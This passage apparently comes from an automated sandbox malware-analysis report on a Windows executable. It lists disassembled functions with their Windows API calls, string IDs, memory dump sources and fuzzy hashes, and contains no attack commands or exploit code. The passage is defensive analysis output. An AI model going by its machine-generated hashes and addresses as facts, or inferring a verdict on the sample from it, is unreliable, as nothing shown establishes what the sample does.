                                                                              • SendMessageW.USER32 ref: 0046FBAF
                                                                              • SendMessageW.USER32 ref: 0046FBE2
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                              • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                              • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                              • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                              • SendMessageW.USER32 ref: 0046FD00
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                              • String ID:
                                                                              • API String ID: 2632138820-0
                                                                              • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                              • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                              • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                              • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                              Function 00433BAC Relevance: 22.6, APIs: 15, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                              • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CursorLoad
                                                                              • String ID:
                                                                              • API String ID: 3238433803-0
                                                                              • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                              • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                              • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                              • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                              Function 00460ABB Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                              • _wcslen.LIBCMT ref: 00460B00
                                                                              • __swprintf.LIBCMT ref: 00460B9E
                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                              • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                                              • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                              • GetParent.USER32(?), ref: 00460D40
                                                                              • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                              • String ID: %s%u
                                                                              • API String ID: 1899580136-679674701
                                                                              • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                              • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                              • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                              • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                              Function 0047D5F6 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 210COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                              • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                              • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                              • API String ID: 2485709727-934586222
                                                                              • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                              • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                              • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                              • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                              Function 0045DB3E Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 181COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                              • String ID: HH
                                                                              • API String ID: 3381189665-2761332787
                                                                              • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                              • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                              • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                              • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                              Function 00434506 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 00434585
                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                              • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                              • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                              • String ID: (
                                                                              • API String ID: 3300687185-3887548279
                                                                              • Opcode ID: a49f41e91dac5baa2c50b775dc8de30f0d01d64d4146e99f951c4697ae3d27a6
                                                                              • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                              • Opcode Fuzzy Hash: a49f41e91dac5baa2c50b775dc8de30f0d01d64d4146e99f951c4697ae3d27a6
                                                                              • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                              Function 0045E41B Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 150COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                              • __swprintf.LIBCMT ref: 0045E4D9
                                                                              • _printf.LIBCMT ref: 0045E595
                                                                              • _printf.LIBCMT ref: 0045E5B7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString_printf$__swprintf_wcslen
                                                                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                              • API String ID: 3590180749-2894483878
                                                                              • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                              • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                              • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                              • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                              Function 0046F90E Relevance: 21.1, APIs: 14, Instructions: 147windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                                              • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                              • DeleteObject.GDI32(?), ref: 0046F950
                                                                              • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                                              • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                              • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                              • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                              • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                              • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                              • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                              • DeleteObject.GDI32(?), ref: 0046FA68
                                                                              • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                              • String ID:
                                                                              • API String ID: 3412594756-0
                                                                              • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                              • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                              • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                              • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                              Function 0045D971 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 140COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                              • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                              • API String ID: 4013263488-4113822522
                                                                              • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                              • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                              • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                              • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                              Function 00435A35 Relevance: 21.1, APIs: 14, Instructions: 136timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                              • String ID:
                                                                              • API String ID: 228034949-0
                                                                              • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                              • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                              • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                              • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                              Function 004334CA Relevance: 21.1, APIs: 14, Instructions: 132filecommemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                              • DeleteObject.GDI32(?), ref: 00433603
                                                                              • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                              • String ID:
                                                                              • API String ID: 3969911579-0
                                                                              • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                              • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                              • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                              • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                              Function 00445A77 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 73windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32 ref: 00445A8D
                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                              • __wcsicoll.LIBCMT ref: 00445AC4
                                                                              • __wcsicoll.LIBCMT ref: 00445AE0
                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                              • API String ID: 3125838495-3381328864
                                                                              • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                              • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                              • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                              • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                              Function 00479921 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 314COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CopyVariant$ErrorLast
                                                                              • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                              • API String ID: 2286883814-4206948668
                                                                              • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                              • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                              • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                              • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                              Function 00475D8B Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 194COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                              • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                              • _wcscpy.LIBCMT ref: 00475F18
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
